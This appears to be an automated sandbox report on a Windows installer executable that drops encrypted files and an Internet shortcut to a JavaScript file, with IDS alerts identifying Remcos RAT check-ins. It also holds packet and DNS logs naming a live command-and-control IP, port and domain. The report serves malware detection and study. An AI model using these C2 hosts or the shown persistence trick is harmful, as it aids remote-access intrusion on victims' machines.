                                                                                  Size (bytes):104448
                                                                                  Entropy (8bit):6.271128694234634
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:N5bLezW9FfTut/Dde6u640ewy4Za9coRC2jfTq8QLeAg0FuzW:N5bLezWWt/Dd314V14ZgP0JaAOzW
                                                                                  MD5:8645EE059F7491C27B56F84F572A1AED
                                                                                  SHA1:BEE65D077ACB41BDE50E37DBDE02B1B5841FD7B2
                                                                                  SHA-256:B1A0D20F4CE8BAE90D73CF0DE11591223E6AA6A147A38FEDBB726F43DE03B319
                                                                                  SHA-512:9B12C47E13467AD25B0F88CF6B4546232C48E5178B9DCC59CB909DA03338D44C5B92EF64FCC0C98E28908B74E4BF5E299B67B7CA66BC35CFA2639352929167A1
                                                                                  Malicious:false
                                                                                  Preview:1.L$ ....|$..D$ PW...7....u.W....B...L$ ....8.L$......t..k....|$...PW.%>........t$..|$...W..8....L$..O....._^[..]...U....V.u...WV.E.....3.G..tw....}.S.^..E..E....r..F..H.......E....r..F..H.......E....r..F..H.......E......[r..N..q........F...........t'...t....t..u........&..~._3.^....j._..3..u..u..u..u.......W.' .........`.....U......<.d$,..d$4.SVW3...F.L$(.t$D......]....:....#...s..u.V......u1...H..|9...D9.t..@8.@......|9...D9.t..@8.@.......h..I..L$<.Ii.....D$8..P.8w...~..r.F..p........N....D$..A..D$..A..D$ .A..L$..D$$.......t$..t$.....I.......hP.L..t$..I..Y.L$.;.uS..t..T$..P.L.+.......0f;.\$..]..t$..t$.u.......u.3...u..6..P.I..d.D$.f9D$......@..hp.L..GI..Y.L$.;.u\..t..T$..p.L.+.......0f;.\$..]..t$..t$.u!......u.3...u$.6..L.I........z....D$.f9D$......@..h..L...H..Y.L$.;.uM..t..T$....L.+...4....f;.t$..t$..\$..].u.......u.3...u.j.._.D$.f9D$......@..h..L..xH..Y.L$.;.uT..t/.T$....L.+.T$...0.....t$.f;.t$.u .T$.......u.3...u.j....I*.......f;T$......@....L..L$.....
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):92160
                                                                                  Entropy (8bit):7.9977036402420225
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:aBBviVJPmTXw7f/zIyTnWPd++uRE7/bUZ78bHgWmIZ/ixHWGA/EmZUcuoYE7Z/FZ:MBuxswbsy7WPNbQYgbfp1A/ZZNRYkhFZ
                                                                                  MD5:55295B4FA65ECDF193B67F66EC43B2D2
                                                                                  SHA1:4DC8234A65BB0BD4B53050916479FE46937347D4
                                                                                  SHA-256:096FB31FBADB5B88A84667C8B697AB4CD879056AF190F7B7F6A61AC1C319FAB2
                                                                                  SHA-512:27D93F91351216E6D41756303F7E894FFE50561A544278C7A13FD5E033FCB0EDC79657B346BFBB7FE6D25C754E2B5C0CCC6B462167BE478C6675D30CB7C88C8D
                                                                                  Malicious:false
                                                                                  Preview:E.....;..!...v..<f..$.A.........z.}..i.2n.r.u.>...E...e..UC...C{eo3D..K[.wy....@5R.N.....I...g:.$`.u...Q.......~..A.. .F.!Y;f.`>..E.mQ.q|[.UR....]...L}......T5`..i..,.W.sy.q..I..(.2...|x.....?el..."..q.p...);.w@.c.../.f....=G.......!.}...&...y.....f....@f........>.f. .|o'M...i.l...K.^|C.[.]..G...S..Z.x.B>Ho..+XA..*..Q.#...d..n.2....R"...6..l..z....^./.y..P..k.V..........:r.].)...I......72...j....+nE...a.%..X..F.G.$j.6...@w...M......C.Uf.=..k|.}1O....w.0..u..._9f.E^.+.x.FT....YS].A......"d......O.fq.&..,....%W<..:e...u...:...ll*.p./...<L...b.....L!.^`...$>....@f......<...]*.....D.I.f.O.....j..G.p.......I'....F-&<..?N..W.=K`y.".:lYs..._...!!...xF..c.......%?6.x..Z.......k.q.i..%.b....eF.....M....;6..M..^..a...6n.......u...@.^.....XJ...3T...E.W=0.z.NM.n.<}.(.s..8[..sS......M.M...pe._T&..!.....W./. .......T......../.qvy...K..]".}....;.....t..*>4<.k=.QV*....p..6+..G,.$W.t.T.-O.#..+......^./..Y..:.o.Td'......S.......f.d.6]x.A...-.Q; a...
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):77824
                                                                                  Entropy (8bit):7.997293656107534
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:nlHJcu111hHwerW8RUC/hD8GzrTRgRAQmqmIWbruRjzbeVKIGFWSU2MNmd:lpcw1hNqWD9kAQoIWbrQDeVKIlSVM6
                                                                                  MD5:0306260A6BC38AA5DBD8948E5440BF61
                                                                                  SHA1:7BAF4CEC13E1FBB2298252381B11D5526EFD27B6
                                                                                  SHA-256:481AB5460A952BC0B5016D38584BB37E9DF49AC8B565B1B9FF58E6F9E479362D
                                                                                  SHA-512:8D8705D33090717B0C22D28432D71AD384D6157BD6BD91C2F0B130E0FF99B360F6EAF60C61941B76854ECB5040CF369DE85D07F6D61557C396A03818D1332991
                                                                                  Malicious:false
                                                                                  Preview:.g5..k..K.2F.}.f.......:..y^~oNS.S.Q9.).."..r.h..N.|...;..J...On..&..fHKx...c#.\U.J.........y{.*.......c....?..I.,w.D:..w.q...&,A..3F.....Zd.....>=......d..@...;%....E.>-......:..E..6....`.t.....g..-ga......PV.."....?.`......~n.,ZA6..Z9......;.TZ>4.b.*.CLS..p^D#..'+..#w=...b.....u.....P.Prk38.J.],...D).Z..?...q.O.9.......bW$....{.n+..0|yex.z.Tq.dk......-..*@<.(...1.SN..%l..Z.y......dc.I.^Y...VMb.;....?\.......5.Dk3.1V.d.....n#.<.K_l^......Y...\uL..!.G-...M....|#..QQ[...|...3.y.)Q....P.. G......l..>v....IL.@.}..E.$.fP......~*..6.....NJ...v..A.S.Xo....[Hp..1t.S.4..E7#...B...K......i.5.v..\`..........9.]D^.o..$xV....R;........g.1@<JE.V\..R...s|../../.u.....l...'....5.. ."..>.EY....3G...q...>=..+T..Q,..........CS.J=m`.J.d...w lU..OT!+.........7...$G...!.*`M.p....W.{R..........<....o..i......6f.=..9.X..70./..r8f..I.Q..V.&....._#..3%2.u(|_...i...=.K.n....|lrr....dFcH.......".i\....x8.VR..G.|.;i.E.d....t...%.....8....=.....p=.0o.B..u.-....Yc..
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):94208
                                                                                  Entropy (8bit):6.332052519965856
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:c1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDzdZPp7HM:cZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/y
                                                                                  MD5:40F119370AF8F62616FCB5D6FD9CB7B5
                                                                                  SHA1:33C64EC1DFFAA51741721A353E05F4B27723DEA0
                                                                                  SHA-256:556FE900A4FC1B0EBDF401D9743C2E74C0AC165B0361C5EF16B597E74EF8111F
                                                                                  SHA-512:40E9246B536E07740BC0ECA56E6774028A679D08163AE9A4FFA03D1321296AC593E8FF9D6E2A30DF47C74779359FCEC914AD12E9567F463AA1761E445F0909B8
                                                                                  Malicious:false
                                                                                  Preview:.hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................................................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):69632
                                                                                  Entropy (8bit):6.564032174584603
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:L+tKA3QkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPEBiqXv++:rA3laW2UDQWf05mjccBiqXv1
                                                                                  MD5:9CA2B08CAE1EA5EBDCB5A4883D863C3E
                                                                                  SHA1:0DD9890ED8BD7CE9BD577D8F9A3DB528ABA1088A
                                                                                  SHA-256:E755FBD1474CCB45AA18C0A97EEF322C71BCD6714DFB4D030D5A55B7FA9C3C30
                                                                                  SHA-512:C3193A8634F8CA91E136CF4B4C094F82F2342134FC4DEAB6B5CCE4CA6F154442A1EF9CC27ADB7F8782867B42CDD209DBE3DD76E6FE507ACB785FE805FDB57DBE
                                                                                  Malicious:false
                                                                                  Preview:..M.......M...J.....M...H.....M.........M.........M.........M.....f....M.......M...J.....M..A.....M.........M.........M.........M.....f....M.......M...J.....M..H.....M.........M.........M.........M.....f....M.......M.(.J...$.M..H...(.M.......,.M.......0.M.......4.M.....f..8.M.....<.M...J...H.M..H...L.M.......P.M.......T.M.......X.M.....f..\.M.....`.M...J...l.M.W.H...p.M.......t.M.......x.M.......|.M.....f....M.......M.d.J.....M...H.....M.........M.........M.........M.....f....M.......M...I.....M.k.I.....M.........M.........M.........M.....f....M.......M...J.....M.X.H.....M.........M.........M.........M.....f....M.......M.h.I.....M...H.....M.........M.........M.........M.....f....M.......M...I... .M...H...$.M.......(.M.......,.M.......0.M.....f..4.M.....8.M...I...D.M..H...H.M.......L.M.......P.M.......T.M.....f..X.M.....\.M.0.J...h.M.9.H...l.M.......p.M.......t.M.......x.M.....f..|.M.......M. .J.....M.o.A.....M.........M.........M.........M.....f....M.......M...J.....M.P.A.....M...
                                                                                  Process:C:\Users\user\Desktop\nikDoCvpJa.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):79872
                                                                                  Entropy (8bit):7.9975158081302915
                                                                                  Encrypted:true
                                                                                  SSDEEP:1536:TE64WBH+PmX7t9z9wcsjuYV88nHyQwjCnBcrLTqMV81Q+CgQ2hl5:Ao9RuuM3HyQmCBcrPqMsld
                                                                                  MD5:39BD7CDDA87195136F91ECC649988A42
                                                                                  SHA1:4E1E70CDF5254D59823AAA0955C518F9A38929C7
                                                                                  SHA-256:F2AEE101CECB321C781E68964E3FB1B2172B2F7494ED040C659988E989264A21
                                                                                  SHA-512:309FFA953E5CA568989BFA176F797B295C0CDC22C7876861A7F3800CFE7E76EDFF77C49456C39914CD343A3894EE52E39400FE90E8BCC1EDC1845728A12DCAC1
                                                                                  Malicious:false
                                                                                  Preview:j..Ix..+.A.vs.e.;.U.A...T.b.T.4(.h<.~..X?/C.s..Y8Z.E.(@.=$ep........S.*............Rj.?..@..X6......./-Im..b........0..O.<...[......"=.;(L..`.>..zk........6.]T.......e^..|.S.N....0Y...../"b..........F.x.....a.Bs.N.p...iC.a..aU.Q.&.*.E#L.-.U....G..F..@x.J[..8g.5...uj;.M...Q...N....P...f..>..V .m..h....'.N.R.....c26..r..QC.......U.V..+^.z://..9<.t7...w...,.D.q..T...G..s.m."0..}...._.(.?02.5.......,,.e....{Uiy...K/..e...`.......!.d~Fna../....nv.....H.%R,w:-..[wH...H......C...Tg.K>....>+..&...hd.ud....<.x..S.....E.j=..v...m..-..k.9...}!.\.`@..YK.AwVJ..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....5.<.'.F...h.............mQ..a^..mQ..a^..kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E
                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                  File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js" >), ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):96
                                                                                  Entropy (8bit):4.8279063251453795
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J52A3TdecwIEAMqLI/y:HRYF5yjo9232A4c9p1I/y
                                                                                  MD5:0FF464ECD7422406613DA16C9CD4BC6E
                                                                                  SHA1:69D0BCE415641B7D35322459FC14F7C2E740DFB8
                                                                                  SHA-256:473D04B3C9C5611772F417A2BD524A9A31B0D87C6119F1337EAD71B3B14FCCC0
                                                                                  SHA-512:3DD9CB822CA5846D158FCC0BFA60A587C2B1E068C99809C43F633C1F96A60CF2112639CF30B8D22FBC3CF57B75F167F3C3B3A74C885C1B12053F68E5D73A6AAC
                                                                                  Malicious:true
                                                                                  Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js" ..
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.984134223214029
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:nikDoCvpJa.exe
                                                                                  File size:1'798'791 bytes
                                                                                  MD5:d2729f574a3ba69a10c00a5992986226
                                                                                  SHA1:827b50066bf4509c1f293f2e2170b86070f3bcd6
                                                                                  SHA256:2027658fe07e8ef66d192bf1697cf0d9e91f9813ded69da4408747fb3724b3ec
                                                                                  SHA512:7bc28a41cc7c61dfc1eb205d7b46da0c9453ce7424fe8eceade72fb5429ac08f72b67b77bdc72df3aaac755bb037808f7714a5334c9e5c541d55fead4df279ca
                                                                                  SSDEEP:49152:f4yTKXSSgG7DpdzSzn2Y2+TITsGWgECdytvV9iSkbwrsK+ZTF4ShJtO:AyeSSgG7Dpdzm2YusGW/CqvV94w02iHO
                                                                                  TLSH:328533D57AF3802BD8990EBA14F0114BC5B664F8383DEF5F97114BD8F119F118BA8A4A
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                  Icon Hash:31f0e8d490f0e071
                                                                                  Entrypoint:0x4038af
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:0
                                                                                  File Version Major:5
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                  Signature Valid:false
                                                                                  Signature Issuer:CN=GlobalSign CodeSigning CA - SHA256 - G2, O=GlobalSign nv-sa, C=BE
                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                  Error Number:-2146869232
                                                                                  Not Before, Not After
                                                                                  • 10/11/2015 15:32:11 24/12/2017 12:20:40
                                                                                  Subject Chain
                                                                                  • E=support@implbits.com, CN="Implbits Software, LLC", O="Implbits Software, LLC", L=Lindon, S=Utah, C=US
                                                                                  Version:3
                                                                                  Thumbprint MD5:3F04BAC702761698B870D1B5952D2C85
                                                                                  Thumbprint SHA-1:52AA9079B68E00C5C3C1D8CA7C6C363D0037A59E
                                                                                  Thumbprint SHA-256:D35F904A15D0AD8079CFF4F54FFD3425CAE695F6988F9EDD8964A837785D0B47
                                                                                  Serial:1121534C85F8E4ED8E6A978D0356BA881964
                                                                                  Instruction
                                                                                  sub esp, 000002D4h
                                                                                  push ebx
                                                                                  push ebp
                                                                                  push esi
                                                                                  push edi
                                                                                  push 00000020h
                                                                                  xor ebp, ebp
                                                                                  pop esi
                                                                                  mov dword ptr [esp+18h], ebp
                                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                                  mov dword ptr [esp+14h], ebp
                                                                                  call dword ptr [00409030h]
                                                                                  push 00008001h
                                                                                  call dword ptr [004090B4h]
                                                                                  push ebp
                                                                                  call dword ptr [004092C0h]
                                                                                  push 00000008h
                                                                                  mov dword ptr [0047EB98h], eax
                                                                                  call 00007F77F50B7CDBh
                                                                                  push ebp
                                                                                  push 000002B4h
                                                                                  mov dword ptr [0047EAB0h], eax
                                                                                  lea eax, dword ptr [esp+38h]
                                                                                  push eax
                                                                                  push ebp
                                                                                  push 0040A264h
                                                                                  call dword ptr [00409184h]
                                                                                  push 0040A24Ch
                                                                                  push 00476AA0h
                                                                                  call 00007F77F50B79BDh
                                                                                  call dword ptr [004090B0h]
                                                                                  push eax
                                                                                  mov edi, 004CF0A0h
                                                                                  push edi
                                                                                  call 00007F77F50B79ABh
                                                                                  push ebp
                                                                                  call dword ptr [00409134h]
                                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                                  mov dword ptr [0047EAB8h], eax
                                                                                  mov eax, edi
                                                                                  jne 00007F77F50B52AAh
                                                                                  push 00000022h
                                                                                  pop esi
                                                                                  mov eax, 004CF0A2h
                                                                                  push esi
                                                                                  push eax
                                                                                  call 00007F77F50B7681h
                                                                                  push eax
                                                                                  call dword ptr [00409260h]
                                                                                  mov esi, eax
                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                  jmp 00007F77F50B5333h
                                                                                  push 00000020h
                                                                                  pop ebx
                                                                                  cmp ax, bx
                                                                                  jne 00007F77F50B52AAh
                                                                                  add esi, 02h
                                                                                  cmp word ptr [esi], bx
                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                  • [LNK] VS2010 SP1 build 40219
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x811a2.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1b57970x1af0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x1000000x811a20x81200b3e19c84c679cf55fd4be427d35ae5beFalse0.994193565464666data7.957883026281082IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1820000xfd60x10003c9b5dd0e9f28bd31a752ba6553005b4False0.59814453125data5.586288821054992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0x1001f00x7ae9dPNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.999269047954824
                                                                                  RT_ICON0x17b0900x3525PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.000808526277104
                                                                                  RT_ICON0x17e5b80x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.798006509357201
                                                                                  RT_DIALOG0x180c200x100dataEnglishUnited States0.5234375
                                                                                  RT_DIALOG0x180d200x11cdataEnglishUnited States0.6056338028169014
                                                                                  RT_DIALOG0x180e3c0x60dataEnglishUnited States0.7291666666666666
                                                                                  RT_GROUP_ICON0x180e9c0x30dataEnglishUnited States0.8958333333333334
                                                                                  RT_MANIFEST0x180ecc0x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                  DLLImport
                                                                                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                  USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishUnited States
                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-12-19T23:42:58.468620+01002032776ET MALWARE Remcos 3.x Unencrypted Checkin1192.168.2.549804181.131.217.2443021TCP
                                                                                  2024-12-19T23:42:59.740248+01002032777ET MALWARE Remcos 3.x Unencrypted Server Response1181.131.217.2443021192.168.2.549804TCP
                                                                                  2024-12-19T23:43:01.524052+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549810178.237.33.5080TCP
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 19, 2024 23:42:58.348459959 CET498043021192.168.2.5181.131.217.244
                                                                                  Dec 19, 2024 23:42:58.468028069 CET302149804181.131.217.244192.168.2.5
                                                                                  Dec 19, 2024 23:42:58.468172073 CET498043021192.168.2.5181.131.217.244
                                                                                  Dec 19, 2024 23:42:58.468620062 CET498043021192.168.2.5181.131.217.244
                                                                                  Dec 19, 2024 23:42:58.588115931 CET302149804181.131.217.244192.168.2.5
                                                                                  Dec 19, 2024 23:42:59.740247965 CET302149804181.131.217.244192.168.2.5
                                                                                  Dec 19, 2024 23:42:59.741446018 CET498043021192.168.2.5181.131.217.244
                                                                                  Dec 19, 2024 23:42:59.861721992 CET302149804181.131.217.244192.168.2.5
                                                                                  Dec 19, 2024 23:42:59.973498106 CET302149804181.131.217.244192.168.2.5
                                                                                  Dec 19, 2024 23:43:00.027642012 CET498043021192.168.2.5181.131.217.244
                                                                                  Dec 19, 2024 23:43:00.154680967 CET4981080192.168.2.5178.237.33.50
                                                                                  Dec 19, 2024 23:43:00.274243116 CET8049810178.237.33.50192.168.2.5
                                                                                  Dec 19, 2024 23:43:00.274375916 CET4981080192.168.2.5178.237.33.50
                                                                                  Dec 19, 2024 23:43:00.275007010 CET4981080192.168.2.5178.237.33.50
                                                                                  Dec 19, 2024 23:43:00.394495010 CET8049810178.237.33.50192.168.2.5
                                                                                  Dec 19, 2024 23:43:01.523915052 CET8049810178.237.33.50192.168.2.5
                                                                                  Dec 19, 2024 23:43:01.524051905 CET4981080192.168.2.5178.237.33.50
                                                                                  Dec 19, 2024 23:43:01.533869982 CET498043021192.168.2.5181.131.217.244
                                                                                  Dec 19, 2024 23:43:01.653464079 CET302149804181.131.217.244192.168.2.5
                                                                                  Dec 19, 2024 23:43:02.524173021 CET8049810178.237.33.50192.168.2.5
                                                                                  Dec 19, 2024 23:43:02.524245024 CET4981080192.168.2.5178.237.33.50
                                                                                  Dec 19, 2024 23:43:22.367640018 CET302149804181.131.217.244192.168.2.5
                                                                                  Dec 19, 2024 23:43:22.368899107 CET498043021192.168.2.5181.131.217.244
                                                                                  Dec 19, 2024 23:43:22.488332033 CET302149804181.131.217.244192.168.2.5
                                                                                  Dec 19, 2024 23:43:52.405323982 CET302149804181.131.217.244192.168.2.5
                                                                                  Dec 19, 2024 23:43:52.406918049 CET498043021192.168.2.5181.131.217.244
                                                                                  Dec 19, 2024 23:43:52.526439905 CET302149804181.131.217.244192.168.2.5
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Dec 19, 2024 23:42:11.560640097 CET5582453192.168.2.51.1.1.1
                                                                                  Dec 19, 2024 23:42:11.794698954 CET53558241.1.1.1192.168.2.5
                                                                                  Dec 19, 2024 23:42:57.865504980 CET6138353192.168.2.51.1.1.1
                                                                                  Dec 19, 2024 23:42:58.344794035 CET53613831.1.1.1192.168.2.5
                                                                                  Dec 19, 2024 23:43:00.011619091 CET5378553192.168.2.51.1.1.1
                                                                                  Dec 19, 2024 23:43:00.150248051 CET53537851.1.1.1192.168.2.5
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Dec 19, 2024 23:42:11.560640097 CET192.168.2.51.1.1.10xb287Standard query (0)wnBHxhzUAWNxsjrpdZtUkwTu.wnBHxhzUAWNxsjrpdZtUkwTuA (IP address)IN (0x0001)false
                                                                                  Dec 19, 2024 23:42:57.865504980 CET192.168.2.51.1.1.10x8310Standard query (0)navegacionseguracol24vip.orgA (IP address)IN (0x0001)false
                                                                                  Dec 19, 2024 23:43:00.011619091 CET192.168.2.51.1.1.10x6cfaStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
